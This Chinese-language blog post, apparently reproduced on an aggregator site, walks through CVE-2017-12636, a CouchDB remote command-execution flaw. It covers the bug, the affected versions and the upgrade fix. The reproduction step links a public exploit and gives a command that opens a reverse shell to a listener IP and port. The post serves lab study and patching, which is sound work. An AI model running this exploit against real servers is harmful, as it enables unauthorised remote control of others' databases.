栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 软件开发 > 后端开发 > Python

Apache couchdb 命令执行 (CVE-2017-12636)复现

Python 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

Apache couchdb 命令执行 (CVE-2017-12636)复现

couchdb 命令执行 (CVE-2017-12636)
  • couchdb 命令执行 (CVE-2017-12636)
    • 0x01 漏洞描述
    • 0x02 影响范围
    • 0x03 漏洞复现
      • 工具复现
    • 0x04 漏洞修复

couchdb 命令执行 (CVE-2017-12636)

Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,Javascript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。

0x01 漏洞描述

在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12635是由于Erlang和Javascript对JSON解析方式的不同,导致语句执行产生差异性导致的。这个漏洞可以让任意用户创建管理员,属于垂直权限绕过漏洞。

CVE-2017-12636是一个任意命令执行漏洞,我们可以通过config api修改couchdb的配置query_server,这个配置项在设计、执行view的时候将被运行。

5984端口

0x02 影响范围

小于 1.7.0 以及 小于 2.1.1

0x03 漏洞复现

(1)访问靶场


version 为1.6

工具复现

https://github.com/RedTeamWing/CVE-2017-12636
python3 运行
(1)查看用法

python exp.py 1.6 118.193.36.37 25981

提示 python exp.py http://ip:port  version  反弹ip  反弹端口


(2) 反弹shell

![在这里插入图片描述](https://img-blog.csdnimg.cn/c685d444c6414feca4f25a73772401c9.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAd2hvYW1p44CC,size_20,color_FFFFFF,t_70,g_se,x_16)
0x04 漏洞修复

升级到CouchDB 1.7.1或 2.1.1。

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/423432.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号